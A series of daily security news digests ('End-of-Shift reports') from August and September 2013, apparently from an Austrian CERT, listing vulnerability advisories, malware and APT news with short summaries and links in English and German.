=======================
= End-of-Shift report =
=======================
Timeframe: Montag 02-09-2013 18:00 − Dienstag 03-09-2013 18:00
Handler: Robert Waldner
Co-Handler: n/a
*** Blog: NetTraveler Is Back: The Red Star APT Returns With New Tricks ***
---------------------------------------------
NetTraveler, which we described in depth in a previous post, is an APT that infected hundreds of high profile victims in more than 40 countries. Known targets of NetTraveler (also known as ‘Travnet’ or “Netfile”) include Tibetan/Uyghur activists, oil industry companies, scientific research centers and institutes, universities, private companies, governments and governmental institutions, embassies and military contractors.
---------------------------------------------
http://www.securelist.com/en/blog/208214039/NetTraveler_Is_Back_The_Red_Sta…
*** 353,436 Exposed ZTE Devices Found In Net Census ***
---------------------------------------------
mask.of.sanity writes "Hundreds of thousands of internet-accessible devices manufactured Chinese telco ZTE have been found with default or hardcoded usernames and passwords. The devices were discovered in analysis of the huge dataset from the Internet Census run this year. ZTE topped the charts, accounting for 28 percent of all affected devices worldwide. Only one manufacturer has responded to the researchers bid to supply the data in efforts to stop production of insecure devices."
---------------------------------------------
http://rss.slashdot.org/~r/Slashdot/slashdot/~3/Ev4LKChpZbQ/story01.htm
*** USB-Tastatur kapert Linux-Kern ***
---------------------------------------------
Der Speicher eines Linux-Systems kann durch USB-Endgeräte fast beliebig manipuliert werden, wie ChromeOS-Entwickler Kees Cook entdeckte. Einen Patch für das Problem lieferte er gleich mit.
---------------------------------------------
http://www.heise.de/newsticker/meldung/USB-Tastatur-kapert-Linux-Kern-19475…
*** cPanel Multiple Vulnerabilities ***
---------------------------------------------
A security issue and multiple vulnerabilities have been reported in cPanel, which can be exploited by malicious, local users to disclose potentially sensitive information, bypass certain security restrictions, manipulate certain data, and gain escalated privileges and by malicious users to conduct script insertion attacks, bypass certain security restrictions, and compromise a vulnerable system.
---------------------------------------------
https://secunia.com/advisories/54601
*** Bugtraq: PayPals "invalid" aksession Padding Oracle Flaw ***
---------------------------------------------
The main PayPal web site sets a cookie named "aksession" which contains a blob of base64-encoded ciphertext. This ciphertext is encrypted using a 64-bit block cipher in CBC mode and does not have any other integrity protection. Naturally, this means the aksession cookie is vulnerable to a padding oracle attack allowing full decryption and forgery.
---------------------------------------------
http://www.securityfocus.com/archive/1/528403
*** [remote] - Mikrotik RouterOS sshd (ROSSSH) - Remote Preauth Heap Corruption ***
---------------------------------------------
During an audit the Mikrotik RouterOS sshd (ROSSSH) has been identified to have a remote previous to authentication heap corruption in its sshd component.
Exploitation of this vulnerability will allow full access to the router device.
---------------------------------------------
http://www.exploit-db.com/exploits/28056
*** [webapps] - TP-Link TD-W8951ND - Multiple Vulnerabilities ***
---------------------------------------------
Tested on TP-Link TD-W8951ND Firmware 4.0.0 Build 120607 Rel.30923
---------------------------------------------
http://www.exploit-db.com/exploits/28055
=======================
= End-of-Shift report =
=======================
Timeframe: Freitag 30-08-2013 18:00 − Montag 02-09-2013 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** Njw0rm - Brother From the Same Mother ***
---------------------------------------------
FireEye Labs has discovered an intriguing new sibling of the njRAT remote access tool (RAT) that one-ups its older "brother" with a couple of diabolically clever features. Created by the same author as njRAT - a freelance coder who goes by...
---------------------------------------------
http://www.fireeye.com/blog/technical/malware-research/2013/08/njw0rm-broth…
*** US Mounted 231 Offensive Cyber-operations In 2011, Runs Worldwide Botnet ***
---------------------------------------------
An anonymous reader sends this news from the Washington Post: "U.S. intelligence services carried out 231 offensive cyber-operations in 2011, the leading edge of a clandestine campaign that embraces the Internet as a theater of spying, sabotage and war, according to top-secret documents [from Edward Snowden]. Additionally, under an extensive effort code-named GENIE, U.S. computer specialists break into foreign networks so that they can be put under surreptitious U.S. control. Budget...
---------------------------------------------
http://yro.slashdot.org/story/13/08/31/2223212/us-mounted-231-offensive-cyb…
*** Boffins follow TOR breadcrumbs to identify users ***
---------------------------------------------
Anonymity? Fuggedaboutit! Watching TOR for months reveals true names Its easier to identify TOR users than they believe, according to research published by a group of researchers from Georgetown University and the US Naval Research Laboratory (USNRL).
---------------------------------------------
http://www.theregister.co.uk/2013/09/01/tor_correlation_follows_the_breadcr…
*** Cisco IOS TCP ACK Processing Lets Remote Users Deny Service ***
---------------------------------------------
http://www.securitytracker.com/id/1028969
*** Cisco ASA Idle Timeout Processing Flaw Lets Remote Users Deny Service ***
---------------------------------------------
http://www.securitytracker.com/id/1028968
*** IBM WebSphere Commerce Search Denial of Service Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/54734
=======================
= End-of-Shift report =
=======================
Timeframe: Donnerstag 29-08-2013 18:00 − Freitag 30-08-2013 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** CoreText Font Rendering Bug Leads To iOS, OS X Exploit ***
---------------------------------------------
redkemper writes with this news from BGR.com (based on a report at Hacker News), excerpting: "Android might be targeted by hackers and malware far more often than Apples iOS platform, but that doesnt mean devices like the iPhone and iPad are immune to threats. A post on a Russian website draws attention to a fairly serious vulnerability that allows nefarious users to remotely crash apps on iOS 6, or even render them unusable. The vulnerability is seemingly due to a bug in Apples CoreText...
---------------------------------------------
http://apple.slashdot.org/story/13/08/29/155221/coretext-font-rendering-bug…
*** Cloud-Dienst als Malware-Einfallstor ***
---------------------------------------------
IT-Sicherheitsforscher haben eine Methode gezeigt, mit der über Dropbox und Co. Sicherheitsmechanismen von Firmen überwunden werden können.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Cloud-Dienst-als-Malware-Einfallstor…
*** Sicherheitsforscher knacken Dropbox ***
---------------------------------------------
Client entschlüsselt - Zwei-Weg-Authentifizierung kann umlaufen werden
---------------------------------------------
http://derstandard.at/1376535110812
*** TeleGeographys Interactive Submarine Cable Map ***
---------------------------------------------
....Ever want to know where all the submarine cables are that provide part of the physical infrastructure of the Internet? Or which cities in the world have the most connectivity via submarine cables? (or which regions might be single points of failure?) In doing some research I stumbled across this excellent site from the folks at TeleGeography ...
---------------------------------------------
http://www.submarinecablemap.com/
*** FinFisher range of attack tools ***
---------------------------------------------
FinFisher is a range of attack tools developed and sold by a company called Gamma Group.Recently, some FinFisher sales brochures and presentations were leaked on the net. They contain many interesting details about these tools.In the background part of the FinFisher presentation, they go on to explain how Gamma hired the (at-the-time) main developer of Backtrack Linux to build attack tools for Gamma. This is a reference to Martin Johannes Münch. They also boast how their developers have...
---------------------------------------------
http://www.f-secure.com/weblog/archives/00002601.html
*** vBulletin users warned of potential exploit ***
---------------------------------------------
The forum softwares developers advise users to delete the install folder
---------------------------------------------
http://www.csoonline.com/article/738959/vbulletin-users-warned-of-potential…
*** MatrikonOPC SCADA DNP3 Master Station Improper Input Validation ***
---------------------------------------------
OVERVIEW: This updated advisory was originally posted to the US-CERT secure Portal library on August 02, 2013, and is now being released to the ICS-CERT Web page.Adam Crain of Automatak and independent researcher Chris Sistrunk have identified a buffer overflow vulnerability in MatrikonOPC’s SCADA DNP3 OPC Server application. MatrikonOPC has produced a patch that mitigates this vulnerability. The researchers tested the patch to validate that it resolves the vulnerability.This vulnerability...
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-13-213-04A
*** Cisco Identity Services Engine Discloses Authentication Credentials to Remote Users ***
---------------------------------------------
http://www.securitytracker.com/id/1028965
*** IBM InfoSphere Information Server Web Console Cross-Site Scripting Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/54698
*** Schneider Electric OFS XML External Entities Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/54616
*** Cisco ASA Software TFTP Protocol Inspection Denial of Service Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/54699
*** LibTIFF Multiple Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/54628
*** VMSA-2013-0011 ***
---------------------------------------------
VMware ESXi and ESX address an NFC Protocol Unhandled Exception
---------------------------------------------
http://www.vmware.com/support/support-resources/advisories/VMSA-2013-0011.h…
=======================
= End-of-Shift report =
=======================
Timeframe: Mittwoch 28-08-2013 18:00 − Donnerstag 29-08-2013 18:00
Handler: Robert Waldner
Co-Handler: n/a
*** Bugtraq: Cisco Security Advisory: Cisco Secure Access Control Server Remote Command Execution Vulnerability ***
---------------------------------------------
Cisco Security Advisory: Cisco Secure Access Control Server Remote Command Execution Vulnerability
---------------------------------------------
http://www.securityfocus.com/archive/1/528295
*** Kelihos Relying on CBL Blacklists to Evaluate New Bots ***
---------------------------------------------
The Kelihos botnet is leveraging legitimate security services such as composite blocking lists (CBLs) to test the reliability of victim IP addresses before using them to push spam and malware.
---------------------------------------------
http://threatpost.com/kelihos-relying-on-cbl-blacklists-to-evalute-new-bots…
*** Java Native Layer Exploits Going Up ***
---------------------------------------------
Recently, security researchers disclosed two Java native layer exploits (CVE-2013-2465 and CVE-2013-2471). This caused us too look into native layer exploits more closely, as they have been becoming more common this year. At this year’s Pwn2Own competition at CanSecWest, Joshua Drake showed CVE-2013-1491, which was exploitable on Java 7 running on Windows 8. CVE-2013-1493 has […]Post from: Trendlabs Security Intelligence Blog - by Trend MicroJava Native Layer Exploits Going Up
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/--YBZ1lrFxM/
*** Cisco Secure Access Control Server EAP-FAST Authentication Flaw Lets Remote Users Execute Arbitrary Commands ***
---------------------------------------------
Cisco Secure Access Control Server EAP-FAST Authentication Flaw Lets Remote Users Execute Arbitrary Commands
---------------------------------------------
http://www.securitytracker.com/id/1028958
*** Unpatched Mac bug gives attackers “super user” status by going back in time ***
---------------------------------------------
Exploiting the five-month-old "sudo" flaw in OS X just got easier.
---------------------------------------------
http://feeds.arstechnica.com/~r/arstechnica/security/~3/r1T9FKbYWWY/story01…
*** Triangle MicroWorks Improper Input Validation ***
---------------------------------------------
OVERVIEWAdam Crain of Automatak and independent researcher Chris Sistrunk have identified an improper input validation vulnerability in multiple Triangle MicroWorks’ products and third‑party components. Triangle MicroWorks has produced an update that mitigates this vulnerability. Adam Crain has tested the update to validate that it resolves the vulnerability.This vulnerability could be exploited remotely.AFFECTED PRODUCTSThe following Triangle MicroWorks products are affected:
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-13-240-01
*** Bugtraq: 30C3 Call for Participation ***
---------------------------------------------
30C3 Call for Participation
---------------------------------------------
http://www.securityfocus.com/archive/1/528298
*** Suspect Sendori software, (Thu, Aug 29th) ***
---------------------------------------------
Reader Kevin wrote in to alert us of an interesting discovery regarding Sendori. Kevin stated that two of his clients were treated to malware via the auto-update system for Sendori. In particular, they had grabbed Sendori-Client-Win32/2.0.15 from 54.230.5.180 which is truly an IP attributed to Sendori via lookup results. Sendoris reputation is already a bit sketchy; search results for Sendori give immediate pause but this download in particular goes beyond the pale. With claims that "As of
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=16466&rss
*** WordPress Wordfence 3.8.1 Cross Site Scripting ***
---------------------------------------------
Topic: WordPress Wordfence 3.8.1 Cross Site Scripting Risk: Low Text:# Exploit Title: Wordpress Plugin Wordfence 3.8.1 - Cross Site Scripting # Date: 28 de Agosto del 2013 # Exploit Author: Dyla...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2013080221
*** Google Docs Information Disclosure ***
---------------------------------------------
Topic: Google Docs Information Disclosure Risk: Medium Text:I reported this problem to Google in June but I did not get the usual reply saying they were working on it, so I guess it isn...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2013080224
*** Bugtraq: Drupal Node View Permissions module and Flag module Vulnerabilities ***
---------------------------------------------
Drupal Node View Permissions module and Flag module Vulnerabilities
---------------------------------------------
http://www.securityfocus.com/archive/1/528310
*** Cybercrime-friendly underground traffic exchanges help facilitate fraudulent and malicious activity – part two ***
---------------------------------------------
By Dancho Danchev The list of monetization tactics a cybercriminal can take advantage of, once they manage to hijack a huge portion of Web traffic, is virtually limitless and is entirely based on his experience within the cybercrime ecosystem. Through the utilization of blackhat SEO (search engine optimization), RFI (Remote File Inclusion), DNS cache poisoning, or […]
---------------------------------------------
http://feedproxy.google.com/~r/WebrootThreatBlog/~3/zWNtszZsWRs/
*** IBM InfoSphere Information Server Multiple Vulnerabilities ***
---------------------------------------------
IBM InfoSphere Information Server Multiple Vulnerabilities
---------------------------------------------
https://secunia.com/advisories/54666
*** Office 2003s burial will resurrect hacker activity ***
---------------------------------------------
The end of Microsofts support for popular suite come April 2014 will usher in an era of infinite zero-day attacks, analyst predicts
---------------------------------------------
http://www.csoonline.com/article/738914/office-2003-s-burial-will-resurrect…
*** [papers] - Metasploit -The Exploit Learning Tree ***
---------------------------------------------
Metasploit -The Exploit Learning Tree
---------------------------------------------
http://www.exploit-db.com/download_pdf/27935
*** Outage Analyzer - Track Web Service Outages,in Real Time ***
---------------------------------------------
....Outage Analyzer lets you view internet service outages as they occur around the world. The application lists the outages that are occurring now or can provide a view of outages that have closed recently......
---------------------------------------------
http://www.compuware.com/en_us/application-performance-management/products/…
=======================
= End-of-Shift report =
=======================
Timeframe: Dienstag 27-08-2013 18:00 − Mittwoch 28-08-2013 18:00
Handler: Robert Waldner
Co-Handler: n/a
*** Security Bulletin: IBM Tivoli Monitoring clients affected by vulnerabilities in IBM JRE executed under a security manager. ***
---------------------------------------------
IBM Tivoli Monitoring ships and uses a Java Runtime Environment (JRE). This alert addresses several vulnerabilities for the Tivoli Enterprise Portal browser JRE which might allow remote untrusted Java WebStart applications and untrusted Java applets to affect confidentiality, availability and integrity. CVE(s): CVE-2013-2467, CVE-2013-2448, CVE-2013-2459, CVE-2013-2463, CVE-2013-2464, CVE-2013-2465, CVE-2013-2466, CVE-2013-2468, CVE-2013-2469, CVE-2013-2470, CVE-2013-2471,
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_ibm…
*** Firefox Extension HTTP Nowhere Allows Users to Browse in Encrypted-Only Mode ***
---------------------------------------------
It’s no secret that the Web wasn’t really meant to be a secure platform, for communications or commerce or anything else. But it’s used for all of these functions every day, and for the most part they depend upon the sites they deal with using SSL and doing so correctly. That’s not always a sure [...]
---------------------------------------------
http://threatpost.com/firefox-extension-http-nowhere-allows-users-to-browse…
*** Microsoft Releases Revisions to 4 Existing Updates, (Tue, Aug 27th) ***
---------------------------------------------
Four patches have undergone signficant revision according to Microsoft. The following patches were updated today by Microsoft, and are set to roll in the automatic updates: MS13-057 - Critical - https://technet.microsoft.com/security/bulletin/MS13-057 - Reason for Revision: V3.0 (August 27, 2013): Bulletin revised to rerelease security update 2803821 for Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008; security update 2834902 for Windows XP and Windows Server 2003;
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=16448&rss
*** Asterisk SIP Request Processing Flaw With Invalid SDP Lets Remote Users Deny Service ***
---------------------------------------------
Asterisk SIP Request Processing Flaw With Invalid SDP Lets Remote Users Deny Service
---------------------------------------------
http://www.securitytracker.com/id/1028957
*** Linux-Trojaner analysiert ***
---------------------------------------------
Avast hat den bislang wohl ersten Online-Banking-Trojaner, der es auf Linux-Nutzer abgesehen hat, in seinem Virenlabor untersucht: Der Entwickler hat sich große Mühe gegeben, damit sein Baby unentdeckt bleibt.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Erster-Banking-Trojaner-fuer-Linux-a…
*** Exploit für ungepatchte Lücke in Java 6 aufgetaucht ***
---------------------------------------------
Ein Werkzeug enthält Code, der eine seit Juni bekannte Lücke in Java 6 ausnutzt. Oracle hat die Wartung für diese Version eingestellt, die sich jedoch noch häufig im Einsatz befindet.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Exploit-fuer-ungepatchte-Luecke-in-J…
*** Cybercriminals offer spam-ready SMTP servers for rent/direct managed purchase ***
---------------------------------------------
By Dancho Danchev We continue to observe an increase in underground market propositions for spam-ready bulletproof SMTP servers, with the cybercriminals behind them trying to differentiate their unique value proposition (UVP) in an attempt to attract more customers. Let’s profile the underground market propositions of what appears to be a novice cybercriminal offering such spam-ready […]
---------------------------------------------
http://feedproxy.google.com/~r/WebrootThreatBlog/~3/eWR3avR3M7k/
*** IBM FileNet Content Manager / Content Foundation XML Parser Denial of Service Vulnerability ***
---------------------------------------------
IBM FileNet Content Manager / Content Foundation XML Parser Denial of Service Vulnerability
---------------------------------------------
https://secunia.com/advisories/54632
*** IBM TRIRIGA Application Platform Multiple Cross-Site Scripting Vulnerabilities ***
---------------------------------------------
IBM TRIRIGA Application Platform Multiple Cross-Site Scripting Vulnerabilities
---------------------------------------------
https://secunia.com/advisories/54641
*** Bugtraq: Two Instagram Android App Security Vulnerabilities ***
---------------------------------------------
Two Instagram Android App Security Vulnerabilities
---------------------------------------------
http://www.securityfocus.com/archive/1/528292
=======================
= End-of-Shift report =
=======================
Timeframe: Montag 26-08-2013 18:00 − Dienstag 27-08-2013 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** [Video] ThreatVlog, Episode 1: Tor and Apple exploits revealed ***
---------------------------------------------
What is Tor? Is it really secure? What about the Apple App Store approval process? Are all these applications really looked at? In today's episode, Grayson Milbourne covers the exploitation of the Tor network through Firefox and a proof of concept showing just how insecure Apple app testing can be.
---------------------------------------------
http://blog.webroot.com/2013/08/20/tor-and-apple-exploits-revealed/
*** [Video] ThreatVlog, Episode 2: Keyloggers and your privacy ***
---------------------------------------------
Commercial and black hat keyloggers can infect any device, from your PC at home to the phone in your hand. What exactly are these programs trying to steal? How can this data be used harmfully against you? And what can you do to protect all your data and devices from this malicious data gathering? In...
---------------------------------------------
http://blog.webroot.com/2013/08/26/video-threatvlog-episode-2-keyloggers-an…
*** "thereisnofatebutwhatwemake" - Turbo-charged cracking comes to long passwords ***
---------------------------------------------
Cracking really long passwords just got a whole lot faster and easier.
---------------------------------------------
http://arstechnica.com/security/2013/08/thereisnofatebutwhatwemake-turbo-ch…
*** Feature Phone Hack Can Block Calls, Texts On Some Networks ***
---------------------------------------------
Trailrunner7 writes, quoting Threat Post "By tweaking the firmware on certain kinds of phones, a hacker could make it so other phones in the area are unable to receive incoming calls or SMS messages, according to research presented at the USENIX Security Symposium. The hack involves modifying the baseband processor on some Motorola phones and tricking some older 2G GSM networks into not delivering calls and messages. By watching the messages sent from phone towers and not delivering them
---------------------------------------------
http://it.slashdot.org/story/13/08/26/2254224/feature-phone-hack-can-block-…
*** Patch Management Guidance from NIST, (Tue, Aug 27th) ***
---------------------------------------------
The National Institute of Standards and Technology (NIST) released a new version of guidance around Patch Management last week, NIST SP800-40. The latest release takes a broader look at etnerprise patch management than the previous version, so well worth the read. Patch Management is clearly called out as a "Quick Win" in Critical Control #3 "Secure Configurations for Hardware and Software". Additionally, Patch Management is something that is required by many of the cyber
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=16445&rss
*** NSA: Hardening Tips For Mac OS X ***
---------------------------------------------
....The National Security Agency (NSA) offers "Hardening Tips for Mac OS X" a tri-fold security brochure for the agencys Information Assurance Mission. Its packed with useful tips...... Siehe auch: http://www.nsa.gov/ia/_files/factsheets/macosx_10_6_hardeningtips.pdf
---------------------------------------------
http://www.nsa.gov/ia/_files/factsheets/macosx_hardening_tips.pdf
*** The SCADA That Cried Wolf: Who's Really Attacking Your ICS Devices- Part 2 ***
---------------------------------------------
The concern on ICS/SCADA security gained prominence due to high-profile attacks targeting these devices, most notably Flame and Stuxnet. However, we noted recent findings, which prove that the interest in ICS/SCADA devices as attack platforms is far from waning. We've all read about how insecure ICS/SCADA devices are and how certain threat actors are targeting...
---------------------------------------------
http://blog.trendmicro.com/trendlabs-security-intelligence/the-scada-that-c…
*** Malware-Erkennung für Medizingeräte ***
---------------------------------------------
US-Informatiker wollen über Veränderungen im Stromverbrauch von Medizingeräten Datenschädlinge im Gesundheitsbereich feststellen.
---------------------------------------------
http://www.heise.de/security/meldung/Malware-Erkennung-fuer-Medizingeraete-…
*** Security Bulletin: IBM Notes & Domino fixes for multiple vulnerabilities in IBM JRE ***
---------------------------------------------
IBM Notes and Domino are vulnerable to multiple attacks listed in the Oracle Java SE Critical Patch Update Advisories (February, April and June 2013) as well as miscellaneous client-side attacks listed below. The repaired IBM JRE is available in Notes and Domino 8.5.3 Fix Pack 5 and is also planned for Notes and Domino 9.0.1. CVE(s): CVE-2013-0464, CVE-2012-3325, and CVE-2011-4858 Affected product(s) and affected version(s): IBM Notes and Domino 9.0 IBM Notes and Domino 8.5.x IBM Notes and...
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_ibm…
*** Security Bulletin: IBM Notes & Domino fixes for multiple vulnerabilities in IBM JRE ***
---------------------------------------------
IBM Notes and Domino are vulnerable to multiple attacks listed in the Oracle Java SE Critical Patch Update Advisories (February, April and June 2013) as well as miscellaneous client-side attacks listed below. The repaired IBM JRE is available in Notes and Domino 8.5.3 Fix Pack 5 and is also planned for Notes and Domino 9.0.1. CVE(s): CVE-2013-0809, CVE-2013-1493, CVE-2013-3012, CVE-2013-3011, CVE-2013-3010, CVE-2013-3009, CVE-2013-3008, CVE-2013-3007, CVE-2013-3006, CVE-2013-2455, and
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_ibm…
*** Security Bulletin: IBM Security SiteProtector System can be affected by a vulnerability in the IBM Eclipse Help System (IEHS) (CVE-2013-0467) ***
---------------------------------------------
IBM Security SiteProtector System can be affected by a vulnerability in the IBM Eclipse Help System (IEHS). This vulnerability could allow a remote attacker to obtain the source code of the Help System. CVE(s): and CVE-2013-0467 Affected product(s) and affected version(s): IBM Security SiteProtector System: 2.8.1 and 2.9 Refer to the following reference URLs for remediation and additional vulnerability details. Source Bulletin: http://www-01.ibm.com/support/docview.wss?uid=swg21647392
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_ibm…
*** Security Bulletin: IBM Content Collector - Eclipse Help System Cross Site Scripting Vulnerability (CVE-2013-0464) ***
---------------------------------------------
Cross-Site Scripting vulnerability exists in IBM Eclipse Help System, a component bundled with IBM Content Collector, which is used to display the IBM Content Collector help content. CVE(s): and CVE-2013-0464 Affected product(s) and affected version(s): IBM Content Collector 3.0 Refer to the following reference URLs for remediation and additional vulnerability details. Source Bulletin: http://www-01.ibm.com/support/docview.wss?uid=swg21646473 X-Force Database:
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_ibm…
*** IBM Lotus iNotes Input Validation Flaws Permit Cross-Site Scripting Attacks ***
---------------------------------------------
http://www.securitytracker.com/id/1028954
*** Sixnet Universal Protocol Undocumented Function Codes ***
---------------------------------------------
OVERVIEW: This updated advisory is a follow-up to the original advisory titled ICSA-13-231-01 Sixnet Universal Protocol Undocumented Function Codes that was published August 19, 2013, on the ICS-CERT Web page. Independent researcher Mehdi Sabraoui has identified undocumented function codes in Sixnet's universal protocol. Sixnet has produced a new version of the remote terminal unit (RTU) firmware that mitigates this vulnerability.
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-13-231-01A
*** RoundCube Webmail Edit Email Script Insertion Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/54536
*** IBM DB2 / DB2 Connect Unspecified Security Bypass Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/54644
*** Atlassian 4.x Confluence Sensitive Information Leakage ***
---------------------------------------------
Topic: Atlassian 4.x Confluence Sensitive Information Leakage Risk: Low Text:Since vendor does not seem to care about this issue more than a year after initial report (https://jira.atlassian.com/browse/C...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2013080213
=======================
= End-of-Shift report =
=======================
Timeframe: Freitag 23-08-2013 18:00 − Montag 26-08-2013 18:00
Handler: Robert Waldner
Co-Handler: n/a
*** Mozilla und Chrome erhöhen Anforderungen an Zertifikate ***
---------------------------------------------
In Zukunft wollen die beiden freien Browser SSL-Zertifikate mit einer besonders langen Laufzeit nicht mehr akzeptieren. Die Änderungen betreffen jedoch nur relativ wenige Server.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Mozilla-und-Chrome-erhoehen-Anforder…
*** EU-Meldepflicht bei Datenklau tritt in Kraft ***
---------------------------------------------
Ab sofort müssen Kommunikations-Unternehmen innerhalb von 24 Stunden melden, wenn ein Datenschutzverstoß von nicht oder nicht ausreichend gesicherten Personendaten vorliegt. Auch die Betroffenen müssen in einigen Fällen informiert werden.
---------------------------------------------
http://futurezone.at/netzpolitik/17910-eu-meldepflicht-bei-datenklau-tritt-…
*** RealPlayer Two Vulnerabilities ***
---------------------------------------------
1) An error when handling filenames in RMP can be exploited to cause a stack-based buffer overflow.
2) An error when parsing RealMedia files can be exploited to cause a memory corruption.
Successful exploitation may allow execution of arbitrary code.
---------------------------------------------
https://secunia.com/advisories/54621
*** OpenSSL erzeugt zu oft den gleichen Zufall ***
---------------------------------------------
Der Zufallszahlengenerator der freien Krypto-Bibliothek liefert unter bestimmten Voraussetzungen relativ kurz hintereinander dieselben Zahlen. Noch ist nicht entschieden, ob die OpenSSL-Entwickler oder -Nutzer ihren Code ändern müssen.
---------------------------------------------
http://www.heise.de/security/meldung/OpenSSL-erzeugt-zu-oft-den-gleichen-Zu…
*** IBM WebSphere Commerce Tools Pages Cross-Site Scripting Vulnerabilities ***
---------------------------------------------
IBM WebSphere Commerce Tools Pages Cross-Site Scripting Vulnerabilities
---------------------------------------------
https://secunia.com/advisories/54643
*** IBM Tivoli Workload Scheduler OpenSSL Multiple Vulnerabilities ***
---------------------------------------------
IBM Tivoli Workload Scheduler OpenSSL Multiple Vulnerabilities
---------------------------------------------
https://secunia.com/advisories/54655
*** IBM Lotus iNotes Multiple Cross-Site Scripting Vulnerabilities ***
---------------------------------------------
IBM Lotus iNotes Multiple Cross-Site Scripting Vulnerabilities
---------------------------------------------
https://secunia.com/advisories/54645
*** Cacti Script Insertion and SQL Injection Vulnerabilities ***
---------------------------------------------
Cacti Script Insertion and SQL Injection Vulnerabilities
---------------------------------------------
https://secunia.com/advisories/54531
*** Bugtraq: Wordpress post-gallery Plugin Xss vulnerabilities ***
---------------------------------------------
Wordpress post-gallery Plugin Xss vulnerabilities
---------------------------------------------
http://www.securityfocus.com/archive/1/528243
*** [remote] - Belkin G Wireless Router Firmware 5.00.12 - RCE PoC ***
---------------------------------------------
Belkin G Wireless Router Firmware 5.00.12 - RCE PoC
---------------------------------------------
http://www.exploit-db.com/exploits/27873
=======================
= End-of-Shift report =
=======================
Timeframe: Donnerstag 22-08-2013 18:00 − Freitag 23-08-2013 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** Top Server OPC Improper Input Validation Vulnerability ***
---------------------------------------------
OVERVIEW: Adam Crain of Automatak and independent researcher Chris Sistrunk have identified an improper input validation vulnerability in the Software Toolbox TOP Server DNP Master OPC product. Software Toolbox has produced a new version that mitigates this vulnerability. The researchers have tested the new version to validate that it resolves the vulnerability. This vulnerability could be exploited remotely. AFFECTED PRODUCTS: The following Software Toolbox products are affected:...
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-13-234-02
*** Read of the Week: A Fuzzy Future in Malware Research, (Thu, Aug 22nd) ***
---------------------------------------------
The August 2013 ISSA Journal includes an excellent read from Ken Dunham: A Fuzzy Future in Malware Research. Ken is a SANS veteran (GCFA Gold, GREM Gold, GCIH Gold, GSEC, GCIA) who spends a good bit of his time researching, writing and presenting on malware-related topics. From Kens abstract: "Traditional static analysis and identification measures for malware are changing, including the use of fuzzy hashes which offers a new way to find possible related malware samples on a computer or
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=16427
*** How Exploit Kits Dodge Security Vendors and Researchers ***
---------------------------------------------
Websites with exploit kits are one thing that security vendors and researchers frequently try to look into, so it shouldn't be a surprise that attackers have gone to some length to specifically dodge the good guys. How do they do it? The most basic method used by attackers is an IP blacklist. Just like security...
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/qf9ZXjwNgn0/
*** How Can Social Engineering Training Work Effectively? ***
---------------------------------------------
One particular aspect of DEF CON that always gets some media coverage is the Social Engineering Capture the Flag (SECTF) contest, where participants use nothing more than a phone call to get victims at various Fortune 500 to give up bits of information. These are the sort of social engineering attacks that give security professionals...
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/D-0-ZRv5fSY/
*** Angeblicher Adobe-Reader-Exploit vermutlich ein Fake ***
---------------------------------------------
Es verdichten sich die Indizien dafür, dass es das kritische Sicherheitsloch, dass in der aktuellen Reader-Version klaffen soll, gar nicht gibt.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Angeblicher-Adobe-Reader-Exploit-ver…
*** Pixel Perfect Timing Attacks with HTML5 ***
---------------------------------------------
"This paper describes a number of timing attack techniques that can be used by a malicious web page to steal sensitive data from a browser, breaking cross-origin restrictions. The new requestAnimationFrame API can be used to time browser rendering operations and infersensitive data based on timing data."
---------------------------------------------
http://contextis.co.uk/files/Browser_Timing_Attacks.pdf
*** BSI: Trotz "kritischer Aspekte" keine Warnung vor Windows 8 ***
---------------------------------------------
In einer Stellungnahme stellt das Bundesamt klar, dass es keine grundsätzlichen Sicherheitsbedenken gegen den Einsatz von Windows 8 und Trusted Computing habe. Das BSI kritisiert allerdings bestimmte Aspekte des Betriebssystems.
---------------------------------------------
http://www.heise.de/security/meldung/BSI-Trotz-kritischer-Aspekte-keine-War…
*** Setuid-Probleme auf Debian-Abkömmlingen ***
---------------------------------------------
Ein schlampig programmiertes Setuid-Tool aus dem VMware-Paket beschert Root-Rechte; doch die Ursachen reichen tiefer.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Setuid-Probleme-auf-Debian-Abkoemmli…https://secunia.com/advisories/54580
=======================
= End-of-Shift report =
=======================
Timeframe: Mittwoch 21-08-2013 18:00 − Donnerstag 22-08-2013 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** If you ever use text VTs, dont run XMir right now ***
---------------------------------------------
